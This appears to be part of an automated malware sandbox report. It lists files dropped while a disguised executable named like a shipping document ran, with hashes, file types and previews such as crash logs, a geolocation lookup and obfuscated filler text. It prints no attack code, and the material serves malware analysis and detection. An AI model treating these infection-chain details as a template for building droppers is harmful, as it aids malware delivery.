                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.425902216494177
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsEJg77aI9+ZWpW8VY8dYm8M4JTHFB+q87Czf7I3dB4d:uIjfCI7Eo7VV8J3fk3dB4d
                                                    MD5:282C1B136D02B311084306B7C26123F2
                                                    SHA1:05BEF2455C91FF9156710FB461E0D15AB3541C88
                                                    SHA-256:52504B75F06690AE93581BC7DBF0E606BCB9E0A746A41F97ACC5A434BA5E67A6
                                                    SHA-512:10FD9364CD62978D43EEC7817DB513C7A8508CAA023C55BDE5EE2376B8CF5715B08E44C3F377BAF0AB80EE92108E888B1725A479DB1CC1FEE0DB10E92655BEDD
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306647" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                    Download File
                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):965
                                                    Entropy (8bit):5.023161606859709
                                                    Encrypted:false
                                                    SSDEEP:12:tkeknd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7Pp:qPdVauKyGX85jvXhNlT3/7AcV9Wro
                                                    MD5:213C021986665186ADF388537CF7904A
                                                    SHA1:AC939D70CA45E2BC2643EC9C2B491E39AFFD7B1A
                                                    SHA-256:59379A6DB89949B709D13D99B13CE3F5B9B9F3064198304C6DB83D3503A46825
                                                    SHA-512:07DE974A4EA0E3F0684165D0184C14801B02DA4541A244262107E33B4B2FFE7FE34924171CEB8126357E1DE15064EE43D7737C58E6A5B4188CECF3A0AEA1E68B
                                                    Malicious:false
                                                    Preview:{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):8003
                                                    Entropy (8bit):4.838950934453595
                                                    Encrypted:false
                                                    SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                    MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                    SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                    SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                    SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                    Malicious:false
                                                    Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                    C:\Users\user\AppData\Local\Temp\WER6316.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4736
                                                    Entropy (8bit):3.2401518799586975
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWn0Q90QP0Qgr0QXQ0Q50Q9k2gWXGOszeuzSzbxGQI58mXspc:pgle+uxduoeyOkNP
                                                    MD5:B1890ACCF8B78F59FB6686992860E020
                                                    SHA1:64F2C22C4FA5A1042123D1D9D1D8F4364F2BCEA0
                                                    SHA-256:D7EBF7B9C8520D8E97D7812C6DD59196A7155D4332E1B7EC2074CE42BF9B24C7
                                                    SHA-512:1C36CB9E71B507344EF11CFB5F4D8E31B11646A046C6BFA38D2109520A92BCEE062E56C5ECC1368B9EC5DE3EA4B3480BC849FC9B2D0BD81E6DBCBB7F760387B1
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.9.2.7.9.5.8. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\WER6420.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4742
                                                    Entropy (8bit):3.241392133368642
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWf0QR0Qx0Qg80QXX0QzE0QlJNgMXnRszeuzSzbxGQI5UhmA+:pgle+urkWoeyOkNKQ
                                                    MD5:106BA1D086DF853C3B0EE73BE948DC30
                                                    SHA1:B4A881446F15E8CC9B7BE9A66413185AB2F39DFB
                                                    SHA-256:7CB217137D4DB9B1AE6C6EA0161B28C3D9ACB1E7BCDCBB5EF407BFA237DCB196
                                                    SHA-512:50D103BDB7BBF70AFD5CFD3E46517C9371467294AD64254346F9F482366DE50C38AB55A060A948AA11F75070C99635AFCDCF44805E3396C42D0097B35522FA43
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .4.1.6.5.9.2.7. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\WER644E.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4736
                                                    Entropy (8bit):3.2411815368119576
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWC0QL0QU0Qgv0QXW0Q+0Qb4CSgWXzCszeuzSzbxGQI5Uhmp+:pgle+uxz/oeyOkNKZ
                                                    MD5:06B054049B03CCBD594BDB27A39481C7
                                                    SHA1:6825F2B62075CB830D7ADBE97ACD9E99683E5CAA
                                                    SHA-256:395E982C7101EDB1CC2C3F22DBB7E1A71CCC18BFF19B3780FA54194A2C04F239
                                                    SHA-512:BAAC0EDE6F5FB9B4B125F6F764DCFC9AAA384947E4CB5F0D735BB06C95C65C9F78AA05F28E222D5C39B2C6A553AB79876330D061C6C3D9B3EFB0FDB9AB5553E0
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.9.5.6.8.0.7. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\WER7863.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):3.238231103564202
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWw0Qip0QO0QgC0QX90Qz0QhSNHgUX/zszeuzSzbxGQI5zmF+:pgle+uGe4oeyOkNZ
                                                    MD5:9D707584C1393FA7BF428ECAE29F9349
                                                    SHA1:396BD213B85706F8A451F9C183A8854325608B21
                                                    SHA-256:CE097925E96BB799870A09FDC78E8063BFCEEDD1668B314EFA5A8945F48A544B
                                                    SHA-512:5EAAF7CA979BC062CB7ABD5AF746229529DEA0FF8C77515888E8DB2E69B74EC69864B69850C4885A8D36A82AAAC8F66ADBF33ED537AA253AC704915F3F4FB6F1
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.8.6.5.2.1.7. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\WERB126.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4748
                                                    Entropy (8bit):3.242496238629837
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIiekXkkXfkuguWO0Qc0QY0Qgwv0QX70QK0QAYhg0XPrPszeuzSzbxGQI5UhmA:pzle+uMaIoeyOkNKl
                                                    MD5:D09C10E7934A4E87C5B8CEF1C9A1B574
                                                    SHA1:7D07194DE1CC347FFF142CEF2993B5F8B03280CF
                                                    SHA-256:8E676D0E80467D8C10FF8D51656184AD6CE7103A9447057C665461A8E054F880
                                                    SHA-512:47BC969C64C9DCC68F787D51A26F6AB2AFA80E8196D3A51D07B5803923AB3CCC63D4F4D3992F8F0094839F5210CD9792EA46B9368AC58A1B63E20BA0B941B113
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.7.6. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.9.6.1.2.1.4. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\WERB136.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):3.2378997863377457
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIiRkXkkXfkuguW20QA0QG0Qgc0QXb0Q20QQ76g8Xu4szeuzSzbxGQI5zmXspt:p8le+uauyoeyOkNB
                                                    MD5:9D7CC7C521287E77EF8CAE8C709F00FD
                                                    SHA1:8B3E6277CC23A0091B4CF719A4BDBFAD7966265C
                                                    SHA-256:803C36F68B6585EF11ADE2CBB0191BCFDADFF394543141F8B8AC9807E353E2E1
                                                    SHA-512:06DF2420D492D26D726E019996D87C40C631BE47A041E6B6BA5FA85ECA7E7DF32D3E11CA88C7839314645294BD76545E79B755255900D54FD6CEB4965764DF89
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .3.0.2.4. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.7.6.0.7.6.1. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\WERB184.tmp.WERDataCollectionStatus.txt

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):3.2401759460630677
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIiekXkkXfkuguWn0QB0Q70Qgv0QXc0QJ0QmGHgjXvZEszeuzSzbxGQI5UhmLo:pzle+uxhioeyOkNKB
                                                    MD5:B7BC3E6AAE0C2DA0AFA97894366FB5CB
                                                    SHA1:E3FEE12B28A155914CF91270D2208E57AE0CEF78
                                                    SHA-256:495FF0A5164BF95EDF00FC74996864011FA2189E6CD0BF8611032034661E8D38
                                                    SHA-512:98F0F2A957CF0264BCC7EF0EC1F2A5B5173C357A2F5D4F9240C635F1B04ECECBDDC98C9AF12E5EF6892D3A6F04067543CC189597DD872C074CDD04598EECD9ED
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.7.6. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.6.7.8.9.0.0. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0m0rzv4l.f44.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sdhzpiz.w3v.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\nsi6C91.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):940057
                                                    Entropy (8bit):4.055092724783294
                                                    Encrypted:false
                                                    SSDEEP:6144:JLaw2Ho20R14B5iK1jqkahRmN7N8AMKLuR5L2ZYAC4iNGZwWbEvjQrLHlG:9awOoVmnZN0OoYO5L6C4ow/P
                                                    MD5:BFAAF0E666558EAA228C47A3FC3684A6
                                                    SHA1:A83B5238D4C56AE56451BF54633135C7309A30ED
                                                    SHA-256:747727FED570818BA30C9955F47BBB2CD7FD46F51CA4AE5EA61544B1CD61B2B2
                                                    SHA-512:A5468227DE263DF6EB1F8F83B146C48848A364BA2035A29E3BDCB67D0074BB63E8373E526811DC3A486914BA06F1C7968BD5DF738FAA206B648E133E16C1BD4E
                                                    Malicious:false
                                                    Preview:.)......,...................p............(.......)..........................................................................................................................................................................................................................................G...[...........O...j...............................................................................................................................................8.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Demigrate\refills.txt

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:ASCII text, with very long lines (306), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):477
                                                    Entropy (8bit):4.2758031658111015
                                                    Encrypted:false
                                                    SSDEEP:12:/Sk0C6TMP4eCAEzbDll7gFV0peuMUkWOKKgzRxRkhrfEiMvct:/S5TMPzDEzbplEFV0peuMZJszRYu0t
                                                    MD5:292E116B3003FAD8B824FF54B5222693
                                                    SHA1:D3BE81A8A5404BE699A6A59B316D0E239F60F305
                                                    SHA-256:A7AE5BDF2822C1941C09A9D3535F5B04934D914C16FED87BE1369EC3190ADAF7
                                                    SHA-512:7DC7D2CEE6F5EE002C0049E45E5D58E02DA99AF40CCA7D81FC97853FA463404C6FA6425480DFA954E951B29353D69F81577237D94ECB24D9E06E8287223C9FD2
                                                    Malicious:false
                                                    Preview:sakramentet monicker organisten edderdunsdyne unnipped bolsmnds dysfunctional parrotism..camelopardalis overbeskftigelsen indvirkningerne mooley tornystrenes bovlstrup..brinkmanship stenbroernes efteruddanelseskurser,matmaking fibroadenia sharezer gaseosity vaporiferous falks.underskriftindsmlings skovmaars absurd simulering cerebrotonic harmonisations dmpnings.dioptometre dowser annullwlr overgirded triplicity rosenbedet glorificeredes glsningerne lombrosian mttere waag..

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Distributionsrettighederne\gatfinnernes.tel

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.000122
                                                    Category:dropped
                                                    Size (bytes):100609
                                                    Entropy (8bit):0.15377383202349873
                                                    Encrypted:false
                                                    SSDEEP:48:WNo92FmrnJoUPwwYJ+LW//XVWZJNBD9dGG0E:WNe5oUPwwi+LW/wZJNBBoE
                                                    MD5:C3F66924A836D18C62CD39BCA76A4686
                                                    SHA1:35F86E33B8EFA49B17C0EE1E11A82829D93662DD
                                                    SHA-256:A99DEBA735D90BA79B85356E47CFCBCBD959BDEA538EBD9126715730EAEFE08A
                                                    SHA-512:EF16C0BEB61ECA149BD37AC5D7560CE6D1471849304DA2A25EF3B38C69656AB2F3FA2425A5CB82C1AD2B06F90521EE31843A1D4E0E49E9BE6D41B7F8D8970A9E
                                                    Malicious:false
                                                    Preview:...........................................................................................................................................................................................9................................................................................................................................................................................................................................................................................................................A........................................................................................................................................7..............................................................h......u....................................................................................................................................................................Y.......................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Distributionsrettighederne\menja.lam

                                                    Download File
                                                    Process:C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):169841
                                                    Entropy (8bit):0.16017172270085472
                                                    Encrypted:false
                                                    SSDEEP:96:38f7y3AcZmvLQEZVVMeAlqKNV2Zp3yHstq:o7y3AcZmsEZVVMeAlqRp3y+q
